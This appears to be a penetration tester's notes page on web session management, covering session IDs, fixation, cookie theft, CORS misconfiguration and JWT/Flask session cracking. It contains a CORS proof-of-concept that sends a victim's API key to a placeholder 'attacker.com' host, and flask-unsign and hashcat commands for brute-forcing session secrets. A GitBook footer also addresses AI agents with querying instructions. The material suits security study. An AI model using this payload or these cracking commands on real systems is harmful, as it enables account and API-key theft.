> For the complete documentation index, see [llms.txt](https://notes.m4lwhere.org/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.m4lwhere.org/offensive/web-exploits/session-management.md).

# Session Management

Purpose of sessions is to associate an authenticated account with the resources they are specifically allowed to access. HTTP is stateless, which is why cookies are generally used to maintain user sessions.

Sessions are implemented by the server or the web app, potentially could be written by the site developer as well.

#### Identifiers

Used to uniquely identify an authenticated session. These identifiers can be located in the cookies, a custom HTTP header, URL parameters, or a hidden form field.

#### Predictability

Gather enough session IDs to determine if there's a common theme or factor. Generally requires specialized tools, hardware, or source code. Determine if they are a set of hashes or not. Are the sessions sequential?

Gather sessions manually, with a script, or using tools like Burp's Sequencer.

#### Session Fixation

This flaw is when a session ID assigned before authentication continues to be used after authentication. Very potent when combined with a phishing attack.

#### Stealing Sessions

XSS may be able to steal a session ID if the cookie is not set to HttpOnly. 

## CORS Exploits

We can exploit the `Access-Control-Allow-Origin` headers if they allow arbitrary `Origin` headers in the HTTP request. This can lead to API keys being stolen from users! We can utilize native JS AJAX to steal the information returned by the server.

```markup
<html>
    <title>CORS Exploit POC</title>
    <script>
        var req = new XMLHttpRequest();
        req.onload = reqListener;
        req.open('get','https://api.m4lwhere.org/api/v1/getApiKey',true);
        req.withCredentials = true;
        req.send();
        function reqListener() {
            location='//attacker.com/log?key='+this.responseText;
        };
    </script>
</html>
```

{% embed url="<https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties>" %}

## Web Tokens

JWTs and other tokens are used frequently in web apps. They are used to validate users and session information, and are generally signed with a secret key for integrity. We can either attempt to break the key or ask not to use JWT signing at all.

```bash
flask-unsign -u -c "eyJ1c2VybmFtZSI6IkFub255bW91c19Vc2VyIn0.X2h0pQ.BH7pliC3PH_YFeLJDEc2i_Uc7I4" --wordlist /home/kali/Desktop/rockyou.txt --no-literal-eval --threads 8
hashcat jwt.txt -m 16500 -a 3 ?d?d?d?d
```

{% embed url="<https://jwt.io/#debugger-io>" %}

## References

{% embed url="<https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/06-Session_Management_Testing/README.html>" %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://notes.m4lwhere.org/offensive/web-exploits/session-management.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.